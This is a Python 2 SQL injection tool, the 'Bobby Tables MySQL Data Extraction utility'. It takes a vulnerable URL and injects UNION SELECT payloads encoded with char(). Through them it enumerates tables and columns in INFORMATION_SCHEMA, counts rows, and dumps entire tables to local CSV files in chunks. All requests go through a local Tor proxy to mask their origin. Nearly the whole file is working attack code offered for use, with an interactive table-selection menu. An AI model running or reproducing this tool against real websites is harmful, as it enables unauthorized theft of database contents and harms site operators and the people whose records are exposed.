#!/usr/bin/python
# Bobby Tables MySQL Data Extraction utility
# Extracts data from MySQL databases via SQL injection
# v1.2 !!!!!
# http://twitter.com/info_dox
# www.infodox.co.cc
# blog.infodox.co.cc
import urllib
import os
import time


def convert_char(element):
    """Convert a string into a MySQL char(xxx,xxx,...) expression."""
    char_element = 'char('
    for charac in element:
        char_element += str(ord(charac)) + ','
    char_element = char_element[:-1] + ')'
    return char_element


print "Welcome to Bobby Tables SQL Injection Utility"
print "If your vuln URL is www.blah.com/vuln.php?id=1&page=2[INJECTHERE]&pl0x=3"
print "then the first part of the URL is www.blah.com/vuln.php?id=1&page=2"
print "and the rest is the second part. If there is no second part, leave that field blank."
base_url_start = raw_input("First part of the vuln URL: ")
base_url_end = raw_input("Second part of the vuln URL: ")

# IP:port of Tor running on localhost; passed to every urlopen() call below.
proxies = {'http': 'http://127.0.0.1:8118'}

# Change if the page source already contains the delimiter string.
string_delimiter = '-----'
string_delimiter_char = convert_char(string_delimiter)

# Change if the page source already contains the column delimiter string.
column_delimiter = '!!!!!'
column_delimiter_char = convert_char(column_delimiter)

# Rows fetched per request; increase for speed, but make sure the results
# won't be cut off.
results_limit = str(10)


def print_options(tables):
    """Print the table names as a numbered menu, four entries per row."""
    line = ''
    column = 0
    for idx, table in enumerate(tables, 1):
        idx_str = str(idx).rjust(3)
        # Truncate long names and pad short ones so the columns line up.
        if len(table) > 12:
            line += '\t' + idx_str + ' - ' + table[:12] + '...\t'
        elif len(table) <= 6:
            line += '\t' + idx_str + ' - ' + table + ' \t\t'
        else:
            line += '\t' + idx_str + ' - ' + table + ' \t'
        if idx == len(tables):
            print line + '\n\n\t -1 -\tAll\t\t\t 0 - \tExit'
        elif column == 3:
            print line
            line = ''
            column = 0
        else:
            column += 1


def extract_table(table_name, time_per_get):
    try:
        print "Extracting " + table_name + " table"
        table_arg = table_name
        fw = open(table_arg + '.csv', 'w')
        # Convert the table name to a char(xxx,xxx,...) expression.
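        # Why char()? (Illustrative note, not from the original script.) A
        # quoted literal such as 'users' would put quote characters into the
        # injected URL, which quote-escaping on the target would break;
        # convert_char() avoids quotes entirely, e.g.:
        #   convert_char('users')  ->  char(117,115,101,114,115)
        # which MySQL evaluates back to the string 'users'.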
        table = convert_char(table_arg)
        # Get the column list from INFORMATION_SCHEMA.COLUMNS.
        get_columns_data = base_url_start + '%20union%20select%201,2,concat(' + string_delimiter_char + ',(select%20group_concat(column_name)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%20=%20' + table + '%20and%20table_schema=database()),' + string_delimiter_char + '),4,5,6' + base_url_end
        page = urllib.urlopen(get_columns_data, proxies=proxies)
        columns = page.read().split(string_delimiter)[1].split(',')
        # Get the row count for the table.
        get_table_count = base_url_start + '%20union%20select%201,2,concat(' + string_delimiter_char + ',(select%20count(*)%20FROM%20' + table_arg + '),' + string_delimiter_char + '),4,5,6' + base_url_end
        page = urllib.urlopen(get_table_count, proxies=proxies)
        row_count = page.read().split(string_delimiter)[1].split(',')
        print 'Rows:'
        print row_count[0]
        eta = ((float(row_count[0]) * float(len(columns))) / float(results_limit)) * float(time_per_get)
        print "ETA: " + str(int(eta) / 60) + ' minutes'
        if int(row_count[0]) > 0:
            header = ''
            for column in columns:
                header += column + ','
            print 'Extracting columns:'
            print header[:-1]
            iterations = (int(row_count[0]) / int(results_limit)) + 1
            order_by = columns[0]
            # Pull each column in chunks of results_limit rows and write one
            # "column: value,value,..." line per column to the .csv file.
            for column in columns:
                current_offset = 0
                current_column_data = column + ':'
                for row_id in range(iterations):
                    get_row_data = base_url_start + '%20union%20select%201,2,concat(' + string_delimiter_char + ',(select%20group_concat(t.row1,' + column_delimiter_char + ')%20FROM%20(select%20' + column + '%20as%20row1%20FROM%20' + table_arg + '%20order%20by%20' + order_by + '%20LIMIT%20' + str(current_offset) + ',' + results_limit + ')%20as%20t),' + string_delimiter_char + '),4,5,6' + base_url_end
                    page = urllib.urlopen(get_row_data, proxies=proxies)
                    current_offset += int(results_limit)
                    try:
                        row_data = page.read().split(string_delimiter)[1].split(column_delimiter + ',')
                    except IndexError:
                        # Delimiter missing from the response; skip this chunk.
                        continue
                    # Strip the trailing column delimiter from the last entry.
                    row_data[-1] = row_data[-1][:-len(column_delimiter)]
                    for data_r in row_data:
                        current_column_data += data_r + ','
                fw.write(current_column_data[:-1] + '\n')
                fw.flush()
                os.fsync(fw.fileno())
        else:
            print "The table has no rows"
        fw.close()
    except ValueError as e:
        print e  # some stupid error occurred...


def main():
    t0 = time.time()
    # Get the table list for the current database; timing this first request
    # gives extract_table() a per-request estimate for its ETA calculation.
    get_table_list = base_url_start + '%20union%20select%201,2,concat(' + string_delimiter_char + ',(select%20group_concat(table_name)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=database()),' + string_delimiter_char + '),4,5,6' + base_url_end
    page = urllib.urlopen(get_table_list, proxies=proxies)
    tables = page.read().split(string_delimiter)[1].split(',')
    time_per_get = time.time() - t0
    while True:
        print_options(tables)
        option = raw_input('\nChoose table: ')
        if option == '0':
            return
        try:
            choice = int(option)
        except ValueError:
            print 'wtf?'
            continue
        if choice == -1:
            for table in tables:
                extract_table(table, time_per_get)
        elif 1 <= choice <= len(tables):
            extract_table(tables[choice - 1], time_per_get)
        else:
            print 'wtf?'


if __name__ == "__main__":
    main()
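# Usage sketch (illustrative; the script is interactive and takes no CLI
# arguments). For the example URL from the welcome text:
#   $ python bobbytables.py
#   First part of the vuln URL: http://www.blah.com/vuln.php?id=1&page=2
#   Second part of the vuln URL: &pl0x=3
# Every request then injects a payload of the shape
#   <first part> union select 1,2,concat(<delim>,(<subquery>),<delim>),4,5,6<second part>
# so the vulnerable query is assumed to return six columns, with column 3
# echoed in the page source.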